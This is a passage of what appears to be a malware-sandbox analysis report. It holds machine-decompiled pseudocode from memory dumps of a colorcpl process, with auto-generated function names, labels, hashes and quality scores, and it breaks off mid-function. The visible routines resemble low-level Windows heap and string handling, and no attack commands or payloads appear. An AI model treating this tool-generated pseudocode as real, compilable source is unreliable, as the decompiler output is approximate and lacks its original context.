                                                                                                					L5:
                                                                                                					_t33 = E06E5F3E0(_a8, _t54, _t52);
                                                                                                					if(_t61 == 0) {
                                                                                                						E06E2EB70(_t54, 0x6f079a0);
                                                                                                					} else {
                                                                                                						asm("lock xadd [esi], eax");
                                                                                                						if((_t33 | 0xffffffff) == 0) {
                                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                							E06E595D0();
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                						}
                                                                                                					}
                                                                                                					_t35 = _a8;
                                                                                                					if(_t60 <= 1) {
                                                                                                						L9:
                                                                                                						_t60 = _t60 - 1;
                                                                                                						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						_t56 = 0x3a;
                                                                                                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                                                							 *((short*)(_t52 + _t35)) = 0;
                                                                                                							L10:
                                                                                                							return _t60 + _t60;
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                			}















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7e486fc0a9e68acf38d052c53f83cef7ed35016fde870636aaa28db03464fb3f
                                                                                                • Instruction ID: aef42a8e8c3645941b96a900338a16a0396bf19a9353476e7668a42dd43e0f5d
                                                                                                • Opcode Fuzzy Hash: 7e486fc0a9e68acf38d052c53f83cef7ed35016fde870636aaa28db03464fb3f
                                                                                                • Instruction Fuzzy Hash: 7D3128B2651710EFD7F1AB18CC40BA677B9FF50760F116A19E9260B190E770F900DAD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E53D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				signed short** _t33;
                                                                                                				short* _t38;
                                                                                                				intOrPtr* _t39;
                                                                                                				intOrPtr* _t41;
                                                                                                				signed short _t43;
                                                                                                				intOrPtr* _t47;
                                                                                                				intOrPtr* _t53;
                                                                                                				signed short _t57;
                                                                                                				intOrPtr _t58;
                                                                                                				signed short _t60;
                                                                                                				signed short* _t61;
                                                                                                
                                                                                                				_t47 = __ecx;
                                                                                                				_t61 = __edx;
                                                                                                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                                				if(_t60 > 0xfffe) {
                                                                                                					L22:
                                                                                                					return 0xc0000106;
                                                                                                				}
                                                                                                				if(__edx != 0) {
                                                                                                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                                						L5:
                                                                                                						E06E27B60(0, _t61, 0x6df11c4);
                                                                                                						_v12 =  *_t47;
                                                                                                						_v12 = _v12 + 0xfff8;
                                                                                                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                                						E06E27B60(0xfff8, _t61,  &_v12);
                                                                                                						_t33 = _a8;
                                                                                                						if(_t33 != 0) {
                                                                                                							 *_t33 = _t61;
                                                                                                						}
                                                                                                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                						_t53 = _a12;
                                                                                                						if(_t53 != 0) {
                                                                                                							_t57 = _t61[2];
                                                                                                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                                							while(_t38 >= _t57) {
                                                                                                								if( *_t38 == 0x5c) {
                                                                                                									_t41 = _t38 + 2;
                                                                                                									if(_t41 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t58 = 0;
                                                                                                									if( *_t41 == 0) {
                                                                                                										L19:
                                                                                                										 *_t53 = _t58;
                                                                                                										goto L7;
                                                                                                									}
                                                                                                									 *_t53 = _t41;
                                                                                                									goto L7;
                                                                                                								}
                                                                                                								_t38 = _t38 - 2;
                                                                                                							}
                                                                                                							_t58 = 0;
                                                                                                							goto L19;
                                                                                                						} else {
                                                                                                							L7:
                                                                                                							_t39 = _a16;
                                                                                                							if(_t39 != 0) {
                                                                                                								 *_t39 = 0;
                                                                                                								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                                								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                                							}
                                                                                                							return 0;
                                                                                                						}
                                                                                                					}
                                                                                                					_t61 = _a4;
                                                                                                					if(_t61 != 0) {
                                                                                                						L3:
                                                                                                						_t43 = L06E34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                                						_t61[2] = _t43;
                                                                                                						if(_t43 == 0) {
                                                                                                							return 0xc0000017;
                                                                                                						}
                                                                                                						_t61[1] = _t60;
                                                                                                						 *_t61 = 0;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					goto L22;
                                                                                                				}
                                                                                                				_t61 = _a4;
                                                                                                				if(_t61 == 0) {
                                                                                                					return 0xc000000d;
                                                                                                				}
                                                                                                				goto L3;
                                                                                                			}

















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 017dd985c53338cbcfb6d2163af09c43c9082cea1af25867bbf8ebacd16cdb65
                                                                                                • Instruction ID: dc67e51c8b86e30917dbb43045d547c8976363b59f9e6e35ec88be3c0a1e48b6
                                                                                                • Opcode Fuzzy Hash: 017dd985c53338cbcfb6d2163af09c43c9082cea1af25867bbf8ebacd16cdb65
                                                                                                • Instruction Fuzzy Hash: DC31C235A05715DFD7A48F29C841A7BBBF5EF45784B06906AE849CB390FB30D840CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E06E97016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                                				signed int _v8;
                                                                                                				char _v588;
                                                                                                				intOrPtr _v592;
                                                                                                				intOrPtr _v596;
                                                                                                				signed short* _v600;
                                                                                                				char _v604;
                                                                                                				short _v606;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed short* _t55;
                                                                                                				void* _t56;
                                                                                                				signed short* _t58;
                                                                                                				signed char* _t61;
                                                                                                				char* _t68;
                                                                                                				void* _t69;
                                                                                                				void* _t71;
                                                                                                				void* _t72;
                                                                                                				signed int _t75;
                                                                                                
                                                                                                				_t64 = __edx;
                                                                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                                				_v8 =  *0x6f0d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                                				_t55 = _a16;
                                                                                                				_v606 = __ecx;
                                                                                                				_t71 = 0;
                                                                                                				_t58 = _a12;
                                                                                                				_v596 = __edx;
                                                                                                				_v600 = _t58;
                                                                                                				_t68 =  &_v588;
                                                                                                				if(_t58 != 0) {
                                                                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                                					if(_t55 != 0) {
                                                                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                                					}
                                                                                                				}
                                                                                                				_t8 = _t71 + 0x2a; // 0x28
                                                                                                				_t33 = _t8;
                                                                                                				_v592 = _t8;
                                                                                                				if(_t71 <= 0x214) {
                                                                                                					L6:
                                                                                                					 *((short*)(_t68 + 6)) = _v606;
                                                                                                					if(_t64 != 0xffffffff) {
                                                                                                						asm("cdq");
                                                                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                                						if(_t71 != 0) {
                                                                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                                                                							_t64 = _t22;
                                                                                                							E06E96B4C(_t58, _t22, _t71,  &_v604);
                                                                                                							if(_t55 != 0) {
                                                                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                                                                								_t64 = _t25 + _t68;
                                                                                                								E06E96B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                                							}
                                                                                                							if(E06E37D50() == 0) {
                                                                                                								_t61 = 0x7ffe0384;
                                                                                                							} else {
                                                                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                							}
                                                                                                							_push(_t68);
                                                                                                							_push(_v592 + 0xffffffe0);
                                                                                                							_push(0x402);
                                                                                                							_push( *_t61 & 0x000000ff);
                                                                                                							E06E59AE0();
                                                                                                						}
                                                                                                					}
                                                                                                					_t35 =  &_v588;
                                                                                                					if( &_v588 != _t68) {
                                                                                                						_t35 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                                					}
                                                                                                					L16:
                                                                                                					_pop(_t69);
                                                                                                					_pop(_t72);
                                                                                                					_pop(_t56);
                                                                                                					return E06E5B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                                				}
                                                                                                				_t68 = L06E34620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                                				if(_t68 == 0) {
                                                                                                					goto L16;
                                                                                                				} else {
                                                                                                					_t58 = _v600;
                                                                                                					_t64 = _v596;
                                                                                                					goto L6;
                                                                                                				}
                                                                                                			}






















                                                                                                0x06e97131
                                                                                                0x06e97131
                                                                                                0x06e97136
                                                                                                0x06e9713d
                                                                                                0x06e9713e
                                                                                                0x06e9713f
                                                                                                0x06e9714a
                                                                                                0x06e9714a
                                                                                                0x06e97084
                                                                                                0x06e97088
                                                                                                0x00000000
                                                                                                0x06e9708e
                                                                                                0x06e9708e
                                                                                                0x06e97092
                                                                                                0x00000000
                                                                                                0x06e97092

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4d0a2f9ee42de2aceac0bbdd0ab5747f298f6c49ed3cdfeb1d22ec88f1f89f3
                                                                                                • Instruction ID: b40597e17bbd3561f2a98c0a2eb28a2f06411afa9df808a37a5751ffde807795
                                                                                                • Opcode Fuzzy Hash: e4d0a2f9ee42de2aceac0bbdd0ab5747f298f6c49ed3cdfeb1d22ec88f1f89f3
                                                                                                • Instruction Fuzzy Hash: 2331B372A147519BCB64DF28CC50A6AB3E9BF89600F044A29F8A587790E731E908C7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E06E3C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                                				signed int* _v8;
                                                                                                				char _v16;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed char _t33;
                                                                                                				signed char _t43;
                                                                                                				signed char _t48;
                                                                                                				signed char _t62;
                                                                                                				void* _t63;
                                                                                                				intOrPtr _t69;
                                                                                                				intOrPtr _t71;
                                                                                                				unsigned int* _t82;
                                                                                                				void* _t83;
                                                                                                
                                                                                                				_t80 = __ecx;
                                                                                                				_t82 = __edx;
                                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                                				if((_t33 & 0x00000001) != 0) {
                                                                                                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                                					if(E06E37D50() != 0) {
                                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                					} else {
                                                                                                						_t43 = 0x7ffe0386;
                                                                                                					}
                                                                                                					if( *_t43 != 0) {
                                                                                                						_t43 = E06EE8D34(_v8, _t80);
                                                                                                					}
                                                                                                					E06E32280(_t43, _t82);
                                                                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                                						E06E2FFB0(_t62, _t80, _t82);
                                                                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                                                                						_t83 = _t30;
                                                                                                						E06EE8833(_t83,  &_v16);
                                                                                                						_t81 = _t80 + 0x90;
                                                                                                						E06E2FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                                						_t63 = 0;
                                                                                                						_push(0);
                                                                                                						_push(_t83);
                                                                                                						_t48 = E06E5B180();
                                                                                                						if(_a4 != 0) {
                                                                                                							E06E32280(_t48, _t81);
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t69 = _v8;
                                                                                                						_t12 = _t80 + 0x98; // 0x98
                                                                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                                						E06E3BB2D(_t13, _t12);
                                                                                                						_t71 = _v8;
                                                                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                                						E06E3BB2D(_t16, _t15);
                                                                                                						E06E3B944(_v8, _t62);
                                                                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                                						E06E2FFB0(0, _t80, _t82);
                                                                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                                						 *(_t80 + 0xde) = 0;
                                                                                                						if(_a4 == 0) {
                                                                                                							_t25 = _t80 + 0x90; // 0x90
                                                                                                							E06E2FFB0(0, _t80, _t25);
                                                                                                						}
                                                                                                						_t63 = 1;
                                                                                                					}
                                                                                                					return _t63;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                                				if(_a4 == 0) {
                                                                                                					_t24 = _t80 + 0x90; // 0x90
                                                                                                					E06E2FFB0(0, __ecx, _t24);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}

















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction ID: ff55a3914ac21cb9bd9d26ad714310589cf1a0e5d67ae5a05070a7bfc703b413
                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction Fuzzy Hash: 58317E71A01766BEE7C4EBB0CC84BEAF778BF46604F24615AC42C5B201DB349A09DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E06E56DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _t39;
                                                                                                				intOrPtr _t52;
                                                                                                				intOrPtr _t53;
                                                                                                				signed int _t59;
                                                                                                				signed int _t63;
                                                                                                				intOrPtr _t64;
                                                                                                				intOrPtr* _t66;
                                                                                                				void* _t68;
                                                                                                				intOrPtr _t69;
                                                                                                				signed int _t73;
                                                                                                				signed int _t75;
                                                                                                				intOrPtr _t77;
                                                                                                				signed int _t80;
                                                                                                				intOrPtr _t82;
                                                                                                
                                                                                                				_t68 = __edx;
                                                                                                				_push(__ecx);
                                                                                                				_t80 = __ecx;
                                                                                                				_t75 = _a4;
                                                                                                				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
                                                                                                					L23:
                                                                                                					asm("lock inc dword [esi+0x110]");
                                                                                                					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
                                                                                                						asm("lock inc dword [ecx+eax+0x4]");
                                                                                                					}
                                                                                                					_t39 = 0;
                                                                                                					L13:
                                                                                                					return _t39;
                                                                                                				}
                                                                                                				_t63 =  *(__ecx + 0x88);
                                                                                                				_t4 = _t68 + 7; // 0xa
                                                                                                				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                				_t59 = _t4 & 0xfffffff8;
                                                                                                				_v8 = _t69;
                                                                                                				if(_t75 >= _t63) {
                                                                                                					_t75 = _t75 % _t63;
                                                                                                					L15:
                                                                                                					_t69 = _v8;
                                                                                                				}
                                                                                                				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
                                                                                                				if(_t64 == 0) {
                                                                                                					L14:
                                                                                                					if(E06E56EBE(_t80, _t64, _t75) != 1) {
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					goto L15;
                                                                                                				}
                                                                                                				asm("lock inc dword [ecx+0xc]");
                                                                                                				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
                                                                                                					goto L14;
                                                                                                				} else {
                                                                                                					_t73 = _t59;
                                                                                                					asm("lock xadd [eax], edx");
                                                                                                					if(_t73 + _t59 > _v8) {
                                                                                                						if(_t73 <= _v8) {
                                                                                                							 *(_t64 + 4) = _t73;
                                                                                                						}
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					_t77 = _t73 + _t64;
                                                                                                					_v8 = _t77;
                                                                                                					 *_a12 = _t64;
                                                                                                					_t66 = _a8;
                                                                                                					if(_t66 == 0) {
                                                                                                						L12:
                                                                                                						_t39 = _t77;
                                                                                                						goto L13;
                                                                                                					}
                                                                                                					_t52 =  *((intOrPtr*)(_t80 + 0x10));
                                                                                                					if(_t52 != 0) {
                                                                                                						_t53 = _t52 - 1;
                                                                                                						if(_t53 == 0) {
                                                                                                							asm("rdtsc");
                                                                                                							 *_t66 = _t53;
                                                                                                							L11:
                                                                                                							 *(_t66 + 4) = _t73;
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						E06E46A60(_t66);
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					while(1) {
                                                                                                						_t73 =  *0x7ffe0018;
                                                                                                						_t82 =  *0x7FFE0014;
                                                                                                						if(_t73 ==  *0x7FFE001C) {
                                                                                                							break;
                                                                                                						}
                                                                                                						asm("pause");
                                                                                                					}
                                                                                                					_t66 = _a8;
                                                                                                					_t77 = _v8;
                                                                                                					 *_t66 = _t82;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}



















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                • Instruction ID: 61607640cbe45b99ae285b0feecc88bc4627a96f73434e33e1b4b7a132e0aade
                                                                                                • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                • Instruction Fuzzy Hash: 9B31C731605305DFCB64CF28C880AAAB3A6FFC5314B95D55EE8598B260DF31F942CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E06EC3D40(intOrPtr __ecx, char* __edx) {
                                                                                                				signed int _v8;
                                                                                                				char* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed char _v24;
                                                                                                				char _v28;
                                                                                                				char _v29;
                                                                                                				intOrPtr* _v32;
                                                                                                				char _v36;
                                                                                                				char _v37;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed char _t34;
                                                                                                				intOrPtr* _t37;
                                                                                                				intOrPtr* _t42;
                                                                                                				intOrPtr* _t47;
                                                                                                				intOrPtr* _t48;
                                                                                                				intOrPtr* _t49;
                                                                                                				char _t51;
                                                                                                				void* _t52;
                                                                                                				intOrPtr* _t53;
                                                                                                				char* _t55;
                                                                                                				char _t59;
                                                                                                				char* _t61;
                                                                                                				intOrPtr* _t64;
                                                                                                				void* _t65;
                                                                                                				char* _t67;
                                                                                                				void* _t68;
                                                                                                				signed int _t70;
                                                                                                
                                                                                                				_t62 = __edx;
                                                                                                				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                                                                                				_v8 =  *0x6f0d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                                                                                				_t34 =  &_v28;
                                                                                                				_v20 = __ecx;
                                                                                                				_t67 = __edx;
                                                                                                				_v24 = _t34;
                                                                                                				_t51 = 0;
                                                                                                				_v12 = __edx;
                                                                                                				_v29 = 0;
                                                                                                				_v28 = _t34;
                                                                                                				E06E32280(_t34, 0x6f08a6c);
                                                                                                				_t64 =  *0x6f05768; // 0x771a5768
                                                                                                				if(_t64 != 0x6f05768) {
                                                                                                					while(1) {
                                                                                                						_t8 = _t64 + 8; // 0x771a5770
                                                                                                						_t42 = _t8;
                                                                                                						_t53 = _t64;
                                                                                                						 *_t42 =  *_t42 + 1;
                                                                                                						_v16 = _t42;
                                                                                                						E06E2FFB0(_t53, _t64, 0x6f08a6c);
                                                                                                						 *0x6f0b1e0(_v24, _t67);
                                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                                                                                							_v37 = 1;
                                                                                                						}
                                                                                                						E06E32280(_t45, 0x6f08a6c);
                                                                                                						_t47 = _v28;
                                                                                                						_t64 =  *_t64;
                                                                                                						 *_t47 =  *_t47 - 1;
                                                                                                						if( *_t47 != 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                                                                                							L10:
                                                                                                							_push(3);
                                                                                                							asm("int 0x29");
                                                                                                						} else {
                                                                                                							_t48 =  *((intOrPtr*)(_t53 + 4));
                                                                                                							if( *_t48 != _t53) {
                                                                                                								goto L10;
                                                                                                							} else {
                                                                                                								 *_t48 = _t64;
                                                                                                								_t61 =  &_v36;
                                                                                                								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                                                                                								_t49 = _v32;
                                                                                                								if( *_t49 != _t61) {
                                                                                                									goto L10;
                                                                                                								} else {
                                                                                                									 *_t53 = _t61;
                                                                                                									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                                                                                									 *_t49 = _t53;
                                                                                                									_v32 = _t53;
                                                                                                									goto L8;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L11:
                                                                                                						_t51 = _v29;
                                                                                                						goto L12;
                                                                                                						L8:
                                                                                                						if(_t64 != 0x6f05768) {
                                                                                                							_t67 = _v20;
                                                                                                							continue;
                                                                                                						}
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                				L12:
                                                                                                				E06E2FFB0(_t51, _t64, 0x6f08a6c);
                                                                                                				while(1) {
                                                                                                					_t37 = _v28;
                                                                                                					_t55 =  &_v28;
                                                                                                					if(_t37 == _t55) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						_t59 =  *_t37;
                                                                                                						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                                                                                							goto L10;
                                                                                                						} else {
                                                                                                							_t62 =  &_v28;
                                                                                                							_v28 = _t59;
                                                                                                							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                                                                                							continue;
                                                                                                						}
                                                                                                					}
                                                                                                					L18:
                                                                                                				}
                                                                                                				_pop(_t65);
                                                                                                				_pop(_t68);
                                                                                                				_pop(_t52);
                                                                                                				return E06E5B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                                                                                				goto L18;
                                                                                                			}


































                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cf028263955ed0d243a1cc463c325baacd279859142960735b71a2131333c75f
                                                                                                • Instruction ID: 46e4f8d5836b360153159d9659668df7f10c0d0d73d850ad91d980d66a70d9c6
                                                                                                • Opcode Fuzzy Hash: cf028263955ed0d243a1cc463c325baacd279859142960735b71a2131333c75f
                                                                                                • Instruction Fuzzy Hash: 54319C71909302DFCB90DF14DA8085ABBE5FF85628F04996EF4A89B281D730DD05CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E06E4A70E(intOrPtr* __ecx, char* __edx) {
                                                                                                				unsigned int _v8;
                                                                                                				intOrPtr* _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t16;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t28;
                                                                                                				char* _t33;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr _t38;
                                                                                                				void* _t50;
                                                                                                				intOrPtr _t52;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t52 =  *0x6f07b10; // 0x18
                                                                                                				_t33 = __edx;
                                                                                                				_t48 = __ecx;
                                                                                                				_v12 = __ecx;
                                                                                                				if(_t52 == 0) {
                                                                                                					 *0x6f07b10 = 8;
                                                                                                					 *0x6f07b14 = 0x6f07b0c;
                                                                                                					 *0x6f07b18 = 1;
                                                                                                					L6:
                                                                                                					_t2 = _t52 + 1; // 0x19
                                                                                                					E06E4A990(0x6f07b10, _t2, 7);
                                                                                                					asm("bts ecx, eax");
                                                                                                					 *_t48 = _t52;
                                                                                                					 *_t33 = 1;
                                                                                                					L3:
                                                                                                					_t16 = 0;
                                                                                                					L4:
                                                                                                					return _t16;
                                                                                                				}
                                                                                                				_t17 = L06E4A840(__edx, __ecx, __ecx, _t52, 0x6f07b10, 1, 0);
                                                                                                				if(_t17 == 0xffffffff) {
                                                                                                					_t37 =  *0x6f07b10; // 0x18
                                                                                                					_t3 = _t37 + 0x27; // 0x3f
                                                                                                					__eflags = _t3 >> 5 -  *0x6f07b18; // 0x1
                                                                                                					if(__eflags > 0) {
                                                                                                						_t38 =  *0x6f07b9c; // 0x0
                                                                                                						_t4 = _t52 + 0x27; // 0x3f
                                                                                                						_v8 = _t4 >> 5;
                                                                                                						_t50 = L06E34620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                                                						__eflags = _t50;
                                                                                                						if(_t50 == 0) {
                                                                                                							_t16 = 0xc0000017;
                                                                                                							goto L4;
                                                                                                						}
                                                                                                						 *0x6f07b18 = _v8;
                                                                                                						_t8 = _t52 + 7; // 0x1f
                                                                                                						E06E5F3E0(_t50,  *0x6f07b14, _t8 >> 3);
